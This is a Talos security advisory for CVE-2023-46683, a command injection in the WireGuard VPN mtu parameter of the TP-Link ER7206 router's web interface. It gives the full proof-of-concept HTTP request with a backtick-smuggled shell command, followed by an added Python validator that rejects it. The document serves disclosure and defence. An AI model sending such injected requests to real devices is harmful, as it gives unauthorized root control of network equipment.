TP-Link ER7206 Omada Gigabit VPN Router uhttpd Wireguard VPN command injection vulnerability

2024-02-06 00:00:00
Talos Intelligence
www.talosintelligence.com

CVSS3: 7.2 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

AI Score: 8.3 High (Confidence: Low)
EPSS: 0.001 Low (Percentile: 20.1%)

Talos Vulnerability Report

TALOS-2023-1857

TP-Link ER7206 Omada Gigabit VPN Router uhttpd Wireguard VPN command injection vulnerability

February 6, 2024
CVE Number

CVE-2023-46683

SUMMARY

A post-authentication command injection vulnerability exists when configuring the WireGuard VPN functionality of the TP-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

TP-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591

PRODUCT URLS

ER7206 Omada Gigabit VPN Router - <https://www.tp-link.com/us/business-networking/vpn-router/er7206/>

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

DETAILS

The ER7206 Omada Gigabit VPN Router is a high-performance networking solution that supports gigabit connectivity, highly secure VPN, and integration with Omada SDN for centralized cloud management and zero-touch provisioning.

The ER7206 Omada Gigabit VPN Router runs various services to manage the router and the devices connected to it. One such service is uhttpd, which listens on ports 80/443 and provides the web interface used to configure and manage the router. By default, the service runs as root, so an attacker who exploits this service gains root access to the device.

A command injection vulnerability exists in the uhttpd service when a WireGuard VPN is configured. In the web interface, the WireGuard VPN page can be accessed by navigating to VPN -> Wireguard -> Wireguard. It contains features to add, edit, and delete WireGuard VPN configs. Adding a WireGuard VPN config triggers the following HTTP POST request:

POST /cgi-bin/luci/;stok=9e2eb3d79de53c7c782818e1c1207a22/admin/wireguard?form=wireguard HTTP/1.1
Host: 192.168.8.100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 493
Origin: http://192.168.8.100
Connection: close
Referer: http://192.168.8.100/webpages/index.html
Cookie: sysauth=92aa29a050e499c3535fe22777162b24

data=%7b%22method%22%3a%22add%22%2c%22params%22%3a%7b%22index%22%3a1%2c%22old%22%3a%22add%22%2c%22new%22%3a%7b%22name%22%3a%22BBBCBB%22%2c%22mtu%22%3a%221420%60id%3e%2ftmp%2fattack_pptp_gloabl1%60%22%2c%22listen_port%22%3a%2251828%22%2c%22private_key%22%3a%22iLyVlWgnFvSjbwToLV3CByPjnHTM2wnRUYeopez9XEo%3d%5c%22BBBB%22%2c%22public_key%22%3a%22F29F0HmVdvi8VZvl%2fqLyU140Gx3mlipCctgu4rPdh0U%3d%22%2c%22local_ipaddr%22%3a%22192.168.8.1%22%2c%22status%22%3a%22on%22%7d%2c%22id%22%3a%22add%22%7d%7d

The mtu parameter of the configuration is vulnerable to command injection. Its value is used as an argument to a shell command without any sanitization, so an attacker who includes shell metacharacters in the mtu parameter can alter the executed command and introduce unauthorized commands. Even though administrative access is required to trigger this vulnerability, it can be used to acquire unrestricted shell access to the device as root.
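As an added illustration that is not part of the Talos advisory or TP-Link's firmware, the following Python shows the defensive check the vulnerable handler lacks: decode the form-encoded `data` field, extract `params.new.mtu`, and accept it only if it is a plain integer in a plausible range, so the request body shown above is rejected before any value can reach a command line. The MTU range (576 to 9000) is an assumption of this example, not a value from the advisory.

```python
import json
import re
from urllib.parse import parse_qs, urlencode

# Body of the POST request quoted in the advisory (taken from the page).
SAMPLE_BODY = (
    "data=%7b%22method%22%3a%22add%22%2c%22params%22%3a%7b%22index%22%3a1%2c%22old%22"
    "%3a%22add%22%2c%22new%22%3a%7b%22name%22%3a%22BBBCBB%22%2c%22mtu%22%3a%221420%60id"
    "%3e%2ftmp%2fattack_pptp_gloabl1%60%22%2c%22listen_port%22%3a%2251828%22%2c%22private_key"
    "%22%3a%22iLyVlWgnFvSjbwToLV3CByPjnHTM2wnRUYeopez9XEo%3d%5c%22BBBB%22%2c%22public_key%22"
    "%3a%22F29F0HmVdvi8VZvl%2fqLyU140Gx3mlipCctgu4rPdh0U%3d%22%2c%22local_ipaddr%22%3a%22192"
    ".168.8.1%22%2c%22status%22%3a%22on%22%7d%2c%22id%22%3a%22add%22%7d%7d"
)

# Allow-list: digits only, then a range check. Range is an assumption for this example.
MTU_PATTERN = re.compile(r"[0-9]{1,5}")
MTU_MIN, MTU_MAX = 576, 9000


def parse_wireguard_request(body: str) -> dict:
    """Decode the form-encoded 'data' field and return the JSON payload inside it."""
    fields = parse_qs(body, keep_blank_values=True)
    raw = fields.get("data", [None])[0]
    if raw is None:
        raise ValueError("missing data field")
    return json.loads(raw)


def validate_mtu(value) -> int:
    """Return the MTU as an int; raise ValueError for anything that is not a plain
    in-range integer. Backticks, '>', ';' and similar never pass the regex."""
    text = str(value)
    if not MTU_PATTERN.fullmatch(text):
        raise ValueError(f"mtu is not a plain integer: {text!r}")
    mtu = int(text)
    if not MTU_MIN <= mtu <= MTU_MAX:
        raise ValueError(f"mtu out of range: {mtu}")
    return mtu


def check_request(body: str) -> dict:
    """Parse a request body and report whether its mtu would be accepted."""
    new_cfg = parse_wireguard_request(body).get("params", {}).get("new", {})
    try:
        return {"accepted": True, "mtu": validate_mtu(new_cfg.get("mtu", ""))}
    except ValueError as exc:
        return {"accepted": False, "reason": str(exc)}


def make_body(new_cfg: dict) -> str:
    """Build a constructed request body with the same structure as SAMPLE_BODY."""
    payload = {"method": "add", "params": {"index": 1, "old": "add", "new": new_cfg, "id": "add"}}
    return urlencode({"data": json.dumps(payload)})
```

Even with input validation in place, the durable fix is to stop building a shell command string from request fields and instead pass the validated integer as a separate argv element.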

VENDOR RESPONSE

The vendor released a new firmware available at: https://www.tp-link.com/us/support/download/er7206/v1/#Firmware

TIMELINE

2023-12-04 - Initial Vendor Contact
2023-12-05 - Vendor Disclosure
2024-02-01 - Vendor Patch Release
2024-02-06 - Public Release

Credit

Discovered by the Vulnerability Discovery and Research team of Cisco Talos.
